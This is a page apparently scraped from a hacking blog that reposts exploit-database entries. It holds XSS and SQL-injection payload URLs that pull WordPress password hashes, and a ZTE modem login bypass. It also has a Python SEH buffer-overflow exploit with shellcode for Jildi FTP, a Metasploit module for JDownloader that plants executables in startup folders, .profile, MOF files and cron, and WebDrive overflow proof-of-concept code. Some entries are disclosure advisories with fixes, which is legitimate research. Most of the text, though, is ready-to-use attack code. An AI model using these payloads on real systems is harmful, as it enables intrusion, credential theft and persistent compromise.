source: https://www.securityfocus.com/bid/53537/info
The Soundcloud Is Gold plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Soundcloud Is Gold 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/wp-admin/admin-ajax.php
POSTDATA: action=soundcloud_is_gold_player_preview&request=1&width="></iframe><script>alert(1)</script>
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863134213
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/53533/info
The Share and Follow plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Share and Follow 1.80.3 is vulnerable; other versions may also be affected.
http://www.example.com/wp-admin/admin.php?page=share-and-follow-menu
CDN API Key content: "><script>alert(document.cookie);</script>
source: https://www.securityfocus.com/bid/53532/info
Sharebar plugin for WordPress is prone to multiple cross-site scripting and SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.
Successful exploits will allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Sharebar 1.2.1 is vulnerable; other versions may also be affected.
http://www.example.com/wp-admin/options-general.php?page=Sharebar&t=edit&id=1 AND 1=0 UNION SELECT 1,2,3,4,user_pass,6 FROM wp_users WHERE ID=1
http://www.example.com/wp-content/plugins/sharebar/sharebar-admin.php?status=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
# Exploit Title: ZTE AC 3633R USB Modem Multiple Vulnerabilities
# Date: 4/06/2015
# Exploit Author: [Vishnu (@dH3wK)
# Vendor Homepage: [http://zte.com.cn
# Version: 3633R
# Tested on: Windows, Linux
Greetings from vishnu (@dH4wk)
1. Vulnerable Product Version
- ZTE AC3633R (MTS Ultra Wifi Modem)
2. Vulnerability Information
(A) Authentication Bypass
Impact: Attacker gains administrative access
Remotely Exploitable: UNKNOWN
Locally Exploitable: YES
(B) Device crash which results in reboot
Impact: Denial of service, The crash may lead to RCE locally thus
attaining root privilege on the device
Remotely Exploitable: UNKNOWN
Locally Exploitable: YES
3. Vulnerability Description
(A) The administrative authentication mechanism of the modem can be
bypassed by feeding with a string of 121 characters in length, either in
username or password field.
(B) A crash causes the modem to restart. This is caused when either of
the password or username fields are fed with an input of 130 characters
or above.
[Note: If username is targeted for exploitation, then password field shall
be fed with minimum 6 characters (any characters) and vice versa ]
# Exploit Title: CVE-2015-4153 - WordPress zM Ajax Login & Register
Plugin [Local File Inclusion]
# Date: 2015/06/01
# Exploit Author: Panagiotis Vagenas
# Contact: https://twitter.com/panVagenas
# Vendor Homepage: http://zanematthew.com/
# Software Link:
https://downloads.wordpress.org/plugin/zm-ajax-login-register.1.0.9.zip
# Version: 1.0.9
# Tested on: WordPress 4.2.2
# Category: webapps
# CVE: CVE-2015-4153
* Description
Any authenticated or non-authenticated user can perform a local file
inclusion attack by exploiting the wp_ajax_nopriv_load_template action.
Plugin simply includes the file specified in 'template' POST parameter
without any further validation.
* Proof of Concept
Send a post request to
`http://my.vulnerable.website.com/wp-admin/admin-ajax.php` with data:
`action=load_template&template=[relative path to local
file]&security=[wp nonce]&referer=[action from which the nonce came from]`
* Timeline
2015/06/01 Discovered
2015/06/01 Vendor alerted via contact form at his website
2015/06/03 Vendor responded
2015/06/03 Fixed in version 1.1.0
* Solution
Update to version 1.1.0
source: https://www.securityfocus.com/bid/53531/info
Pretty Link Lite plugin for WordPress is prone to multiple cross-site scripting and SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.
Successful exploits will allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Pretty Link Lite 1.5.2 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/pretty-link/pretty-bar.php?url="><script>alert(document.cookie);</script>
http://www.example.com/wp-content/plugins/pretty-link/prli-bookmarklet.php?k=c69dbe5f453820a32b0d0b0bb2098d3d&target_url=%23"><script>alert(document.cookie);</script><a name="
http://www.example.com/wp-admin/admin.php?page=pretty-link/prli-clicks.php&action=csv&l=1%20and%201=0%20UNION%20SELECT%20user_pass%20FROM%20wp_users%20WHERE%20ID=1
#!/usr/bin/python
#Author: Zahid Adeel
#Title: Jildi FTP Client 1.5.6 (SEH) BOF
#Version: 1.5.6 Build 1536
#Software Link: http://usfiles.brothersoft.com/internet/ftp/jildiftp.zip
#Tested on: WinXP Professional SP3
#Date: 2015-06-03
#EDB Ref.: https://www.exploit-db.com/exploits/37187/
#Open jildi-poc.txt file and copy its content on clipboard. Then run Jildi FTP client, click on Connect icon and paste this string in server text input #field. On successful exploitation, you will see calc.exe running on your system.
fname="jildi-poc.txt"
junk = "A" * 10096
n_seh = "\xeb\x06\x90\x90"
ppr = "\x56\x0B\x01\x1B" # PPR in msjet40.dll
#run your calc.exe
shellcode=("\x89\xe5\xd9\xc2\xd9\x75\xf4\x5d\x55\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4b\x39\x43\x30"
"\x45\x50\x43\x30\x45\x30\x4c\x49\x5a\x45\x56\x51\x49\x42\x52"
"\x44\x4c\x4b\x50\x52\x56\x50\x4c\x4b\x51\x42\x54\x4c\x4c\x4b"
"\x56\x32\x54\x54\x4c\x4b\x52\x52\x56\x48\x54\x4f\x4f\x47\x50"
"\x4a\x56\x46\x56\x51\x4b\x4f\x56\x51\x49\x50\x4e\x4c\x47\x4c"
"\x43\x51\x43\x4c\x54\x42\x56\x4c\x47\x50\x4f\x31\x58\x4f\x54"
"\x4d\x43\x31\x49\x57\x4b\x52\x4c\x30\x56\x32\x50\x57\x4c\x4b"
"\x56\x32\x52\x30\x4c\x4b\x51\x52\x47\x4c\x43\x31\x58\x50\x4c"
"\x4b\x51\x50\x43\x48\x4b\x35\x4f\x30\x54\x34\x51\x5a\x43\x31"
"\x4e\x30\x56\x30\x4c\x4b\x51\x58\x45\x48\x4c\x4b\x56\x38\x47"
"\x50\x43\x31\x49\x43\x5a\x43\x47\x4c\x47\x39\x4c\x4b\x56\x54"
"\x4c\x4b\x43\x31\x49\x46\x50\x31\x4b\x4f\x50\x31\x4f\x30\x4e"
"\x4c\x4f\x31\x58\x4f\x54\x4d\x45\x51\x58\x47\x50\x38\x4d\x30"
"\x54\x35\x4c\x34\x45\x53\x43\x4d\x4b\x48\x47\x4b\x43\x4d\x51"
"\x34\x52\x55\x4d\x32\x50\x58\x4c\x4b\x50\x58\x51\x34\x45\x51"
"\x49\x43\x52\x46\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x56\x38\x45"
"\x4c\x43\x31\x4e\x33\x4c\x4b\x43\x34\x4c\x4b\x45\x51\x58\x50"
"\x4d\x59\x50\x44\x47\x54\x51\x34\x51\x4b\x51\x4b\x45\x31\x56"
"\x39\x50\x5a\x56\x31\x4b\x4f\x4b\x50\x51\x48\x51\x4f\x50\x5a"
"\x4c\x4b\x45\x42\x5a\x4b\x4d\x56\x51\x4d\x52\x4a\x45\x51\x4c"
"\x4d\x4b\x35\x4f\x49\x43\x30\x45\x50\x43\x30\x56\x30\x45\x38"
"\x56\x51\x4c\x4b\x52\x4f\x4c\x47\x4b\x4f\x4e\x35\x4f\x4b\x4b"
"\x4e\x54\x4e\x50\x32\x5a\x4a\x45\x38\x49\x36\x4d\x45\x4f\x4d"
"\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x45\x56\x43\x4c\x45\x5a\x4d"
"\x50\x4b\x4b\x4b\x50\x54\x35\x54\x45\x4f\x4b\x50\x47\x54\x53"
"\x52\x52\x52\x4f\x43\x5a\x45\x50\x56\x33\x4b\x4f\x49\x45\x43"
"\x53\x45\x31\x52\x4c\x43\x53\x56\x4e\x45\x35\x54\x38\x45\x35"
"\x45\x50\x41\x41")
padding = "F" * (15000 - len(junk) -len(shellcode) - 8)
poc = junk + n_seh + ppr + shellcode + padding
fhandle = open(fname , 'wb')
fhandle.write(poc)
fhandle.close()
=begin
# Exploit Title: JDownloader 2 Beta Directory Traversal Vulnerability (Zip Extraction)
# Date: 2015-06-02
# Exploit Author: PizzaHatHacker
# Vendor Homepage: http://jdownloader.org/home/index
# Software Link: http://jdownloader.org/download/offline
# Version: 1171 <= SVN Revision <= 2331
# Contact: PizzaHatHacker[a]gmail[.]com
# Tested on: Windows XP SP3 / Windows 7 SP1
# CVE:
# Category: remote
1. Product Description
Extract from the official website :
"JDownloader is a free, open-source download management tool with a huge community of developers that makes downloading as easy and fast as it should be. Users can start, stop or pause downloads, set bandwith limitations, auto-extract archives and much more. It's an easy-to-extend framework that can save hours of your valuable time every day!"
2. Vulnerability Description & Technical Details
JDownloader 2 Beta is vulnerable to a directory traversal security issue.
Class : org.appwork.utils.os.CrossSystem
Method : public static String alleviatePathParts(String pathPart)
This method is called with a user-provided path part as parameter,
and should return a valid and safe path where to create a file/folder.
This method first checks that the input filepath does not limit
itself to a (potentially dangerous) sequence of dots and otherwise
removes it :
pathPart = pathPart.replaceFirst("\\.+$", "");
However right after this, the value returned is cleaned from
starting and ending white space characters :
return pathPart.trim();
Therefore, if you pass to this method a list of dots followed by some white space
like ".. ", it will bypass the first check and then return the valid path ".."
which is insecure.
This leads to a vulnerability when JDownloader 2 Beta just downloaded a ZIP file and
then tries to extract it. A ZIP file with an entry containing ".. " sequence(s)
would cause JD2b to overwrite/create arbitrary files on the target filesystem.
3. Impact Analysis :
To exploit this issue, the victim is required to launch a standard ZIP file download.
The Unzip plugin is enabled by default in JDownloader : any ZIP file downloaded will
automatically be extracted.
By exploiting this issue, a malicious user may be able to create/overwrite arbitrary
files on the target file system.
Therefore, it is possible to take the control of the victim's machine with the rights of
the JDownloader process - typically standard (non-administrator) rights - for example by
overwriting existing executable files, by uploading an executable file in a user's
autorun directory etc.
4. Common Vulnerability Scoring System
* Exploitability Metrics
- Access Vector (AV) : Network (AV:N)
- Access Complexity (AC) : Medium (AC:M)
- Authentication (Au) : None (Au:N)
* Impact Metrics
- Confidentiality Impact (C) : Partial (C:P)
- Integrity Impact (I) : Partial (I:P)
- Availability Impact (A) : Partial (A:P)
* CVSS v2 Vector (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVSS Base Score : 6.8
- Impact Subscore 6.4
- Exploitability Subscore 8.6
5. Proof of Concept
- Create a ZIP file with an entry like ".. /poc.txt"
- Upload it to an HTTP server (for example)
- Run a vulnerable revision of JDownloader 2 Beta and use it to download the file from the server
- JD2b will download and extract the file, which will create a "poc.txt" one level upper from your download directory
OR see the Metasploit Exploit provided.
6. Vulnerability Timeline
2012-04-27 : Vulnerability created (SVN Revision > 1170)
2014-08-19 : Vulnerability identified
[...] : Sorry, I was not sure how to handle this and forgot about it for a long time
2015-05-08 : Vendor informed about this issue
2015-05-08 : Vendor response + Code modification (Revision 2332)
2015-05-11 : Code modification (SVN Revision 2333)
2015-05-11 : Notified the vendor : The vulnerable code is still exploitable via ".. .." (dot dot blank dot dot)
2015-05-12 : Code modification (SVN Revision 2335)
2015-05-12 : Confirmed to the vendor that the code looks now safe
2015-06-01 : JDownloader 2 Beta Update : Looks not vulnerable anymore
2015-06-04 : Disclosure of this document
7. Solution
Update JDownloader 2 Beta to the latest version.
8. Personal Notes
I am NOT a security professional, just a kiddy fan of security.
I was boring so I looked for some security flaws in some software and happily found this.
If you have any questions/remarks, don't hesitate to contact me by email.
I'm interesting in any discussion/advice/exchange/question/criticism about security/exploits/programming :-)
=end
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::EXE
include Msf::Exploit::WbemExec
def initialize( info = {} )
super( update_info( info,
'Name' => 'JDownloader 2 Beta Directory Traversal Vulnerability',
'Description' => %q{
This module exploits a directory traversal flaw in JDownloader 2 Beta
when extracting a ZIP file (which by default is automatically done by JDL).
The following targets are available :
Windows regular user : Create executable file in the 'Start Menu\Startup'
under the user profile directory. (Executed at next session startup).
Linux regular user : Create an executable file and a .profile script calling
it in the user's home directory. (Executed at next session login).
Windows Administrator : Create an executable file in C:\\Windows\\System32
and a .mof file calling it. (Executed instantly).
Linux Administrator : Create an executable file in /etc/crontab.hourly/.
(Executed within the next hour).
Vulnerability date : Apr 27 2012 (SVN Revision > 1170)
},
'License' => MSF_LICENSE,
'Author' => [ 'PizzaHatHacker <PizzaHatHacker[A]gmail[.]com>' ], # Vulnerability Discovery & Metasploit module
'References' =>
[
[ 'URL', 'http://jdownloader.org/download/offline' ],
],
'Platform' => %w{ linux osx solaris win },
'Payload' => {
'Space' => 20480, # Arbitrary big number
'BadChars' => '',
'DisableNops' => true
},
'Targets' =>
[
[ 'Windows Regular User (Start Menu Startup)',
{
'Platform' => 'win',
'Depth' => 0, # Go up to root (C:\Users\Joe\Downloads\..\..\..\ -> C:\)
'RelativePath' => 'Users/All Users/Microsoft/Windows/Start Menu/Programs/Startup/',
'Option' => nil,
}
],
[ 'Linux Regular User (.profile)',
{
'Platform' => 'linux',
'Depth' => -2, # Go up 2 levels (/home/joe/Downloads/XXX/xxx.zip -> /home/joe/)
'RelativePath' => '',
'Option' => 'profile',
}
],
[ 'Windows Administrator User (Wbem Exec)',
{
'Platform' => 'win',
'Depth' => 0, # Go up to root (n levels)
'RelativePath' => 'Windows/System32/',
'Option' => 'mof',
}
],
[ 'Linux Administrator User (crontab)',
{
'Platform' => 'linux',
'Depth' => 0, # Go up to root (n levels)
'RelativePath' => 'etc/cron.hourly/',
'Option' => nil,
}
],
],
'DefaultTarget' => nil,
'DisclosureDate' => ''
))
register_options(
[
OptString.new('FILENAME', [ true, 'The output file name.', '']),
# C:\Users\Bob\Downloads\XXX\xxx.zip => 4
# /home/Bob/Downloads/XXX/xxx.zip => 4
OptInt.new('DEPTH', [true, 'JDownloader download directory depth. (0 = filesystem root, 1 = one subfolder under root etc.)', 4]),
], self.class)
register_advanced_options(
[
OptString.new('INCLUDEDIR', [ false, 'Path to an optional directory to include into the archive.', '']),
], self.class)
end
# Traversal path
def traversal(depth)
result = '.. /'
if depth < 0
# Go up n levels
result = result * -depth
else
# Go up until n-th level
result = result * (datastore['DEPTH'] - depth)
end
return result
end
def exploit
# Create a new archive
zip = Rex::Zip::Archive.new
# Optionally include an initial directory
dir = datastore['INCLUDEDIR']
if not dir.nil? and not dir.empty?
print_status("Filling archive recursively from path #{dir}")
zip.add_r(dir)
end
# Create the payload executable file path
exe_name = rand_text_alpha(rand(6) + 1) + (target['Platform'] == 'win' ? '.exe' : '')
exe_file = traversal(target['Depth']) + target['RelativePath'] + exe_name
# Generate the payload executable file content
exe_content = generate_payload_exe()
# Add the payload executable file into the archive
zip_add_file(zip, exe_file, exe_content)
# Check all available targets
case target['Option']
when 'mof'
# Create MOF file data
mof_name = rand_text_alpha(rand(6) + 1) + '.mof'
mof_file = traversal(0) + 'Windows\\System32\\Wbem\\Mof\\' + mof_name
mof_content = generate_mof(mof_name, exe_name)
zip_add_file(zip, mof_file, mof_content)
when 'profile'
# Create .profile file
bashrc_name = '.profile'
bashrc_file = traversal(target['Depth']) + bashrc_name
bashrc_content = "chmod a+x ./#{exe_name}\n./#{exe_name}"
zip_add_file(zip, bashrc_file, bashrc_content)
end
# Write the final ZIP archive to a file
zip_data = zip.pack
file_create(zip_data)
end
# Add a file to the target zip and output a notification
def zip_add_file(zip, filename, content)
print_status("Adding '#{filename}' (#{content.length} bytes)");
zip.add_file(filename, content, nil, nil, nil)
end
end
source: https://www.securityfocus.com/bid/53530/info
WP Forum Server plugin for WordPress is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
WP Forum Server 1.7.3 is vulnerable; other versions may also be affected.
http://www.example.com/wp-admin/admin.php?page=forum-server/fs-admin/fs-admin.php&vasthtml_action=structure&do=addforum&groupid=%27%3E%3Cscript%3Ealert%281%29%3C/script%3E
http://www.example.com/wp-admin/admin.php?page=forum-server/fs-admin/fs-admin.php&vasthtml_action=structure&do=editgroup&groupid='><script>alert(document.cookie);</script>
http://www.example.com/wp-admin/admin.php?page=forum-server/fs-admin/fs-admin.php&vasthtml_action=structure&do=editgroup&groupid=2 AND 1=0 UNION SELECT user_pass FROM wp_users WHERE ID=1
http://www.example.com/wp-admin/admin.php?page=forum-server/fs-admin/fs-admin.php&vasthtml_action=usergroups&do=edit_usergroup&usergroup_id='><script>alert(document.cookie);</script>
source: https://www.securityfocus.com/bid/53529/info
The Mingle Forum plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Mingle Forum 1.0.33 is vulnerable; other versions may also be affected.
http://www.example.com/wp-admin/admin.php?page=mfstructure&mingleforum_action=structure&do=addforum&groupid=%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://www.example.com/wp-admin/admin.php?page=mfgroups&mingleforum_action=usergroups&do=edit_usergroup&usergroup_id=1%27%3%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
source: https://www.securityfocus.com/bid/53527/info
The GD Star Rating plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
GD Star Rating 1.9.16 is vulnerable; other versions may also be affected.
http://www.example.com/wp-admin/admin.php?page=gd-star-rating-t2 tpl_section=<script>alert(1)</script>&gdsr_create=Create
source: https://www.securityfocus.com/bid/53526/info
The Leaflet plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Leaflet 0.0.1 is vulnerable; other versions may also be affected.
http://www.example.com/wp-admin/admin.php?page=leaflet_marker&id="><script>alert(1)</script>
source: https://www.securityfocus.com/bid/53526/info
The Leaflet plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Leaflet 0.0.1 is vulnerable; other versions may also be affected.
http://www.example.com/wp-admin/admin.php?page=leaflet_layer&id=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
source: https://www.securityfocus.com/bid/53524/info
Media Library Categories plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Media Library Categories 1.1.1 is vulnerable; other versions may also be affected.
http://www.example.com/wp-admin/admin.php?page=media-library-categories/add.php&bulk=%27%3E%3Cscript%3Ealert%281%29%3C/script%3E&attachments=1
http://www.example.com/wp-admin/upload.php?page=media-library-categories/view.php&q='><script>alert(1)</script>
source: https://www.securityfocus.com/bid/53525/info
LeagueManager plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
LeagueManager 3.7 is vulnerable; other versions may also be affected.
http://www.example.com/wp-admin/admin.php?page=leaguemanager&subpage=show-league&league_id=1&group="><script>alert(1)</script>
http://www.example.com/wp-admin/admin.php?page=leaguemanager&subpage=team&edit=1&season=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
Document Title:
===============
WebDrive 12.2 (B4172) - Buffer Overflow Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1500
Release Date:
=============
2015-06-01
Vulnerability Laboratory ID (VL-ID):
====================================
1500
Common Vulnerability Scoring System:
====================================
6.8
Product & Service Introduction:
===============================
Unlike a typical FTP client, WebDrive allows you to open and edit server-based, files without the additional step of downloading the file.
Using a simple wizard, you assign a network drive letter to the FTP Server. WebDrive supports additional protocols such as WebDAV, SFTP and
Amazon S3 and maps a drive letter to each of these servers.You can map unique drive letters to multiple servers.Download the
full-function 20-day trial of WebDrive and make file management on remote servers easier and more efficient!
(Copy of the Vendor Homepage: http://www.webdrive.com/products/webdrive/ )
Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered an unicode buffer overflow vulnerability in the official WebDrive v12.2 (Build 4172) 32 bit software.
Vulnerability Disclosure Timeline:
==================================
2015-06-01: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
South River Technologies
Product: WebDrive - Software 12.2 (Build 4172) 32 bit
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A buffer overflow software vulnerability has been discovered in the official WebDrive v12.2 (Build 4172) 32 bit software.
The buffer overflow vulnerability allows to include unicode strings to basic code inputs from a system user account to compromise the software process or system.
A fail to sanitize the input of the URL/Address results in compromise of the software system process. Attackers are able to
include large unicode strings to overwrite the registers like eip, ebp and co. WebDrive connects to many types of web servers,
as well as servers in the cloud. You can use WebDrive to access your files on all of the following server types and protocols:
WebDAV ------------>Vulnerable
WebDAV over SSL---->Vulnerable
FTP---------------->Vulnerable
FTP over SSL------->Vulnerable
Amazon S3---------->Vulnerable
SFTP--------------->Vulnerable
FrontPage Server--->Vulnerable
The security risk of the buffer overflow vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.8.
Exploitation of the vulnerability requires a low privilege system user account and no user interaction. Successful exploitation of the vulnerability
results in system compromise by elevation of privileges via overwrite of the registers.
Vulnerable Module(s):
[+] URL/Address
Note: Unlike a typical FTP client, WebDrive allows you to open and edit server-based, files without the additional step of downloading the file.
Using a simple wizard, you assign a network drive letter to the FTP Server. WebDrive supports additional protocols such as WebDAV, SFTP and Amazon S3 and
maps a drive letter to each of these servers.You can map unique drive letters to multiple servers. Download the full-function 20-day trial of WebDrive and
make file management on remote servers easier and more efficient!
Proof of Concept (PoC):
=======================
The buffer overflow web vulnerability can be exploited by local attackers with low privilege system user account and without user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Copy the AAAA...string from WebDrive.txt to clipboard
2. Create a connection
3. Paste it in the URL/Address and attempt to connect.
--- Crash Analysis using WinDBG: [WebDAV] ---
(430.9f8): Access violation - code c0000005 (!!! second chance !!!)
eax=001cad5c ebx=02283af8 ecx=00000041 edx=02289d9c esi=fdf47264 edi=001cad5c
eip=0055ff2b esp=001c8cfc ebp=001c8d00 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\WebDrive\webdrive.exe
webdrive+0x30ff2b:
0055ff2b 66890c16 mov word ptr [esi+edx],cx ds:0023:001d1000=????
0:000> !exchain
001c8d20: webdrive+35a24e (005aa24e)
001cb768: webdrive+1c0041 (00410041)
Invalid exception stack at 00410041
0:000> d 001cb768
001cb768 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
001cb778 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
001cb788 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
001cb798 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
001cb7a8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
001cb7b8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
001cb7c8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
001cb7d8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
WebDAV over SSL
============================
Crash Analysis using WinDBG:
============================
(b88.ca0): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00000000 ecx=00410041 edx=775e660d esi=00000000 edi=00000000
eip=00410041 esp=000a1238 ebp=000a1258 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\system32\ipworks9.dll -
ipworks9!IPWorks_SNPP_Get+0x57f:
00410041 038d4df0e8da add ecx,dword ptr [ebp-25170FB3h] ss:0023:daf302a5=????????
0:000>!exchain
Invalid exception stack at 00410041
FTP and FTP over SSL
============================
Crash Analysis using WinDBG:
============================
(834.70c): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00410041 ecx=00000400 edx=00000000 esi=002d84f0 edi=00000000
eip=775e64f4 esp=002d8488 ebp=002d84dc iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
ntdll!KiFastSystemCallRet:
775e64f4 c3 ret
0:000> !exchain
002d8c1c: webdrive+35a24e (015da24e)
002db664: 00410041
Invalid exception stack at 00410041
Amazon S3
============================
Crash Analysis using WinDBG:
============================
(a64.a98): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00410041 ecx=00000400 edx=00000000 esi=002f8550 edi=00000000
eip=775e64f4 esp=002f84e8 ebp=002f853c iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
ntdll!KiFastSystemCallRet:
775e64f4 c3 ret
0:000> !exchain
002f8c7c: webdrive+35a24e (015da24e)
002fb6c4: 00410041
Invalid exception stack at 00410041
SFTP
============================
Crash Analysis using WinDBG:
============================
(848.9a8): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00410041 ecx=00000400 edx=00000000 esi=002380f8 edi=00000000
eip=775e64f4 esp=00238090 ebp=002380e4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
ntdll!KiFastSystemCallRet:
775e64f4 c3 ret
0:000> !exchain
00238824: webdrive+35a24e (015da24e)
0023b26c: 00410041
Invalid exception stack at 00410041
FrontPage Server
============================
Crash Analysis using WinDBG:
============================
(cd4.710): Access violation - code c0000005 (!!! second chance !!!)
eax=007ba9f0 ebx=05d29738 ecx=00000041 edx=05d2fd48 esi=faa912b8 edi=007ba9f0
eip=003bff2b esp=007b8990 ebp=007b8994 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\WebDrive\webdrive.exe
webdrive+0x30ff2b:
003bff2b 66890c16 mov word ptr [esi+edx],cx ds:0023:007c1000=????
0:000> !exchain
007b89b4: webdrive+35a24e (0040a24e)
007bb3fc: webdrive+360041 (00410041)
Invalid exception stack at 00410041
'''
PoC: Exploitcode
buffer="http://"
buffer+="\x41" * 70000
off=buffer
try:
out_file = open("WebDrive.txt",'w')
out_file.write(off)
out_file.close()
print("[*] Malicious txt file created successfully")
except:
print "[!] Error creating file"
Reference(s):
http://www.webdrive.com/products/webdrive/
https://www.webdrive.com/products/webdrive/download/
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and input restriction of the vulnerable URL/Adress parameters.
Security Risk:
==============
The security risk of the buffer overflow vulnerability in the URL/Address parameter is estimated as high. (CVSS 6.8)
Credits & Authors:
==================
metacom
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
